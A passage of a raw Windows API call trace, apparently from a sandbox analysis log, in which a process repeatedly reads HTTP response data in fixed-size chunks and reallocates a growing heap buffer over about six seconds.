WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9ffa840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9ffa840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0126.312] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9e40040, Size=0x1bf800) returned 0x9c80040 [0126.353] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9e3d040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9e3d040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0126.355] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x1c2000) returned 0x9e40040 [0126.435] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9fff840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9fff840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0126.461] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9e40040, Size=0x1c4800) returned 0xa010040 [0126.502] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0xa1d2040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa1d2040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0126.503] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0xa010040, Size=0x1c7000) returned 0x9c80040 [0126.546] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9e44840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9e44840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0126.546] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x1c9800) returned 0x9e50040 [0126.587] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0xa017040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa017040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0126.621] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9e50040, Size=0x1cc000) returned 0x9c80040 [0126.704] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9e49840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9e49840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0126.704] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x1ce800) returned 0x9e50040 [0126.745] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0xa01c040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa01c040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0126.746] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9e50040, Size=0x1d1000) returned 0xa020040 [0126.787] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0xa1ee840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa1ee840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0126.788] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0xa020040, Size=0x1d3800) returned 0x9c80040 [0126.872] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9e51040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9e51040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0126.897] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x1d6000) returned 0x9e60040 [0126.945] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0xa033840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa033840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0126.946] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9e60040, Size=0x1d8800) returned 0x9c80040 [0126.980] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9e56040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9e56040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0126.981] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x1db000) returned 0x9e60040 [0127.015] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0xa038840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa038840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0127.067] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9e60040, Size=0x1dd800) returned 0x9c80040 [0127.099] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9e5b040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9e5b040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0127.100] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x1e0000) returned 0x9e60040 [0127.155] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0xa03d840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa03d840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0127.156] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9e60040, Size=0x1e2800) returned 0xa050040 [0127.339] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0xa230040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa230040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0127.360] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0xa050040, Size=0x1e5000) returned 0x9c80040 [0127.398] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9e62840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9e62840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0127.398] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x1e7800) returned 0x9e70040 [0127.442] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0xa055040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa055040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0127.442] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9e70040, Size=0x1ea000) returned 0x9c80040 [0127.552] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9e67840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9e67840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0127.569] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x1ec800) returned 0x2580040 [0127.614] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x276a040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x276a040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0127.615] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x2580040, Size=0x1ef000) returned 0x5e50040 [0127.734] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x603c840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x603c840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0127.735] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x1f1800) returned 0x2580040 [0127.779] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x276f040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x276f040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0127.779] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x2580040, Size=0x1f4000) returned 0x5e50040 [0127.822] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6041840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6041840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0127.822] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x1f6800) returned 0x2580040 [0127.905] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x2774040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x2774040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0127.959] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x2580040, Size=0x1f9000) returned 0x5e50040 [0128.004] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6046840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6046840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0128.004] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x1fb800) returned 0x2580040 [0128.050] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x2779040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x2779040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0128.051] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x2580040, Size=0x1fe000) returned 0x5e50040 [0128.172] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x604b840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x604b840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0128.174] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x200800) returned 0x6050040 [0128.276] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x624e040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x624e040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0128.314] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6050040, Size=0x203000) returned 0x9c80040 [0128.387] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9e80840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9e80840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0128.387] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x205800) returned 0x5e50040 [0128.434] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6053040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6053040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0128.434] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x208000) returned 0x6060040 [0128.481] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6265840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6265840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0128.481] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6060040, Size=0x20a800) returned 0x5e50040 [0128.562] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6058040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6058040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0128.598] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x20d000) returned 0x6060040 [0128.675] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x626a840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x626a840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0128.676] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6060040, Size=0x20f800) returned 0x5e50040 [0128.775] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x605d040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x605d040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0128.826] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x212000) returned 0x6060040 [0129.448] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x626f840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x626f840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0129.450] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6060040, Size=0x214800) returned 0x7310040 [0129.529] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x7522040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x7522040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0129.562] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x217000) returned 0x5e50040 [0129.598] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6064840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6064840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0129.599] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x219800) returned 0x6070040 [0129.643] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6287040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6287040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0129.645] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6070040, Size=0x21c000) returned 0x5e50040 [0129.766] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6069840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6069840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0129.766] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x21e800) returned 0x6070040 [0129.837] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x628c040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x628c040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0129.838] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6070040, Size=0x221000) returned 0x7310040 [0129.955] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x752e840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x752e840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0129.955] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x223800) returned 0x5e50040 [0130.021] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6071040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6071040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0130.022] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x226000) returned 0x6080040 [0130.071] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x62a3840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x62a3840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0130.072] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6080040, Size=0x228800) returned 0x5e50040 [0130.168] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6076040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6076040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0130.203] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x22b000) returned 0x6080040 [0130.259] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x62a8840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x62a8840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0130.261] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6080040, Size=0x22d800) returned 0x5e50040 [0130.310] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x607b040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x607b040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0130.311] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x230000) returned 0x6080040 [0130.359] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x62ad840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x62ad840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0130.360] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6080040, Size=0x232800) returned 0x7310040 [0130.433] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x7540040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x7540040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0130.454] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x235000) returned 0x5e50040 [0130.494] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6082840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6082840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0130.494] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x237800) returned 0x7310040 [0130.534] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x7545040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x7545040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0130.535] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x23a000) returned 0x5e50040 [0130.644] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6087840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6087840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0130.645] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x23c800) returned 0x7310040 [0130.697] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x754a040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x754a040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0130.697] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x23f000) returned 0x5e50040 [0130.747] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x608c840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x608c840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0130.794] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x241800) returned 0x7310040 [0130.927] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x754f040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x754f040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0130.928] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x244000) returned 0x5e50040 [0130.974] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6091840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6091840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0130.974] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x246800) returned 0x7310040 [0131.019] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x7554040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x7554040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0131.020] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x249000) returned 0x5e50040 [0131.144] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6096840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6096840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0131.144] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x24b800) returned 0x7310040 [0131.202] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x7559040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x7559040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0131.203] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x24e000) returned 0x5e50040 [0131.291] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x609b840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x609b840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0131.333] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x250800) returned 0x9c80040 [0131.448] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9ece040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9ece040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0131.452] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x253000) returned 0x5e50040 [0131.498] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x60a0840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x60a0840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0131.530] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x255800) returned 0x9c80040 [0131.605] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9ed3040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9ed3040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0131.606] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x258000) returned 0x5e50040 [0131.650] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x60a5840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x60a5840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0131.651] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x25a800) returned 0x9c80040 [0131.694] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9ed8040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9ed8040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0131.694] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x25d000) returned 0x5e50040 [0131.776] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x60aa840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x60aa840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0131.795] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x25f800) returned 0x9c80040 [0131.863] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9edd040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9edd040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0131.863] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x262000) returned 0x5e50040 [0131.963] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x60af840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x60af840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0131.963] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x264800) returned 0x9c80040 [0132.015] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9ee2040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9ee2040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0132.015] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x267000) returned 0x5e50040 [0132.059] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x60b4840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x60b4840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0132.093] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x269800) returned 0x9c80040 [0132.171] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9ee7040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9ee7040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0132.172] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x26c000) returned 0x5e50040 [0132.215] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x60b9840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x60b9840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0132.215] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x26e800) returned 0x9c80040 [0132.257] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9eec040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9eec040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0132.257] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x271000) returned 0x5e50040 [0132.309] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x60be840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x60be840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0132.310] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x273800) returned 0x9c80040 [0132.402] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9ef1040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9ef1040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0132.435] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x276000) returned 0x5e50040 [0132.490] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x60c3840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x60c3840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0132.490] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, 